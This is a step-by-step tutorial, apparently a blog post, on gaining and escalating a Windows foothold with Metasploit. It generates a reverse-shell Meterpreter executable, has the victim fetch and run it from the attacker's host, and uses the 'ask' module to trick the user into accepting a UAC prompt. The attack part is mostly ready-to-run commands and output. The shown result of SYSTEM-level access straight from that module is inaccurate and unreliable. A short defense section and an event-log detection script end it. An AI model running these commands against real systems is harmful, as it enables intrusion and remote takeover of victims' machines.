
Windows Privilege Escalation Using Metasploit’s exploit/windows/local/ask Module

Learn how to escalate privileges on Windows using Metasploit's local ask module with step-by-step payload creation, execution, and validation


Introduction

Privilege escalation is a crucial stage in post-exploitation that allows an attacker to move from a limited user account to an administrative or SYSTEM-level shell. In controlled, ethical hacking environments, demonstrating these techniques can greatly enhance understanding of system security and threat modeling.

This article provides a complete walkthrough of how to:

  1. Generate a custom Windows Meterpreter payload
  2. Deliver and execute the payload to gain an initial session
  3. Elevate privileges using the Metasploit exploit/windows/local/ask module
  4. Validate privilege escalation by obtaining SYSTEM-level access

All steps are explained in a professional, beginner-friendly tone suitable for blog publication and institutional instruction.

Lab Environment

  • Attacker Machine: Kali Linux 
  • Victim Machine: Windows 11 Pro x64 (User-level access only)
  • Framework: Metasploit Framework (MSF)

Phase 1: Payload Generation

We begin by crafting a reverse TCP Meterpreter payload that will be delivered to the Windows machine. This simulates a phishing or file-drop scenario.

Step 1: Generate the Payload

Use msfvenom to create a Windows executable payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /var/www/html/initial_access.exe

  • -p windows/meterpreter/reverse_tcp: Payload type
  • LHOST: Local IP of the Kali machine
  • LPORT: Listener port
  • -f exe: Output format
  • -o: Output file location

Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Saved as: /var/www/html/initial_access.exe

Step 2: Start Web Server for Delivery

sudo systemctl start apache2

Step 3: Start Metasploit Listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

Phase 2: Delivering and Executing the Payload

Simulate downloading the file on the victim system:

Invoke-WebRequest -Uri http://192.168.1.100/initial_access.exe -OutFile C:\Users\User\Downloads\initial_access.exe
Start-Process C:\Users\User\Downloads\initial_access.exe

Result: Meterpreter session is opened.

Phase 3: Confirm Access Level

In Metasploit:

meterpreter > getuid
Server username: DESKTOP-WIN10\User

You currently have access as a regular user.

Phase 4: Privilege Escalation with exploit/windows/local/ask

The exploit/windows/local/ask module is a social engineering-based privilege escalation module. It launches a UAC prompt on the victim machine. If the user accepts it, your payload is executed with elevated privileges.

Step 1: Background the Current Session

meterpreter > background

Step 2: Load the Ask Module

use exploit/windows/local/ask

Step 3: Configure the Module

set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 5555

The UAC prompt itself cannot be customized from the module. exploit/windows/local/ask has no PROMPT_TITLE or PROMPT_MESSAGE options; Windows draws the consent dialog and fills it with the name and publisher of the program requesting elevation.

Step 4: Launch the Exploit

exploit

Metasploit Output:

[*] Started reverse TCP handler on 192.168.1.100:5555
[*] Asking the user for privilege escalation permission...
[*] If the user accepts, a new elevated session will be created.

Step 5: Wait for User Interaction

On the target Windows machine, the user sees the standard UAC consent prompt:

User Account Control
Do you want to allow this app to make changes to your device?

If the user clicks Yes, the module triggers an elevated session.


Phase 5: Post-Escalation Validation

Once the elevated session is returned:

[*] Sending stage (175174 bytes) to 192.168.1.105
[*] Meterpreter session 2 opened (192.168.1.100:5555 -> 192.168.1.105:49158)

Switch to the new session:

sessions -i 2

Check privilege:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

✅ You now have SYSTEM-level access.

Security Considerations

While the ask module isn’t a technical exploit, it’s highly effective in real-world red team operations. It’s a classic example of exploiting human behavior rather than code.

Limitations

  • User must accept the UAC prompt
  • Does not work silently
  • AV/EDR may flag the payload
  • Ideal for demonstration and awareness, not stealth

Best Practices for Defense

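  • Keep UAC enabled and set it to "Always Notify" (with UAC disabled, an administrator's programs start elevated without any consent prompt)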
  • Train users to recognize suspicious prompts
  • Implement application allowlisting
  • Monitor UAC-related events in Windows Event Logs
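
To make the event-log monitoring point concrete, the following is an added example (not part of the original article and not Metasploit code) that flags process-creation events where a full, UAC-elevated token was issued to an image in a user-writable directory. It assumes process-creation auditing is enabled and that Security event 4688 records have been exported to dictionaries keyed by the EventData field names; the hosts, users and file names in the sample are constructed.

```python
import re

# TokenElevationType values logged in Security event 4688 (process creation).
ELEVATION = {"%%1936": "default", "%%1937": "full", "%%1938": "limited"}

# User-writable locations: an elevated image launched from one is a triage lead.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(downloads|desktop|appdata\\local\\temp)"
    r"|users\\public|windows\\temp)\\", re.IGNORECASE)

# Constructed sample records (hosts, users and file names are made up).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "LAB-PC1", "SubjectUserName": "User",
     "NewProcessName": r"C:\Users\User\Downloads\initial_access.exe",
     "TokenElevationType": "%%1938"},   # first run: filtered (limited) token
    {"EventID": 4688, "Computer": "LAB-PC1", "SubjectUserName": "User",
     "NewProcessName": r"C:\Windows\System32\mmc.exe",
     "TokenElevationType": "%%1937"},   # elevated, but a system-path image
    {"EventID": 4688, "Computer": "LAB-PC1", "SubjectUserName": "User",
     "NewProcessName": r"C:\Users\User\AppData\Local\Temp\qXyZ.exe",
     "TokenElevationType": "%%1937"},   # elevated image in the user's Temp dir
    {"EventID": 4624, "Computer": "LAB-PC1", "SubjectUserName": "User"},
]


def suspicious_elevations(events):
    """Return 4688 records where a full (UAC-elevated) token was issued
    to an image that lives in a user-writable directory."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        if ELEVATION.get(ev.get("TokenElevationType")) != "full":
            continue
        image = ev.get("NewProcessName", "")
        if USER_WRITABLE.match(image):
            hits.append({"host": ev.get("Computer"),
                         "user": ev.get("SubjectUserName"),
                         "image": image})
    return hits


if __name__ == "__main__":
    for hit in suspicious_elevations(SAMPLE_EVENTS):
        print("REVIEW {host} {user} elevated {image}".format(**hit))
```

Legitimate installers started from Downloads match the same rule, so treat each hit as a lead to review against the user's activity rather than as a verdict.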

Conclusion

Privilege escalation is an essential step in assessing post-exploitation risk. The Metasploit exploit/windows/local/ask module offers a powerful way to demonstrate how user consent can be misused in insecure environments.